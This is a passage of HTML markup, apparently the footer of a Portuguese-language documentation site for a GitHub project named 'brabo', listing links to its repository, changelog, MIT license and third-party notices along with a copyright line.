href=#theme-svg-external-link /></svg></a></ul></div><div class="theme-layout-footer-column col footer__col"><div class=footer__title>Mais</div><ul class="footer__items clean-list"><li class=footer__item><a href=https://github.com/daneiel/brabo target=_blank rel="noopener noreferrer" class=footer__link-item>GitHub<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/CHANGELOG.md target=_blank rel="noopener noreferrer" class=footer__link-item>CHANGELOG<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/LICENSE target=_blank rel="noopener noreferrer" class=footer__link-item>Licença MIT<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a><li class=footer__item><a href=https://github.com/daneiel/brabo/blob/dev/THIRD_PARTY_NOTICES.md target=_blank rel="noopener noreferrer" class=footer__link-item>Avisos de terceiros<svg width=13.5 height=13.5 aria-label="(opens in new tab)" class=iconExternalLink_jHTF><use href=#theme-svg-external-link /></svg></a></ul></div></div><div class="footer__bottom text--center"><div class=footer__copyright>Copyright © 2026 Daniel Souza. Licenciado sob a MIT. Ferramentas de terceiros mantêm as próprias licenças — ver Avisos de terceiros.</div></div></div></footer></div></body>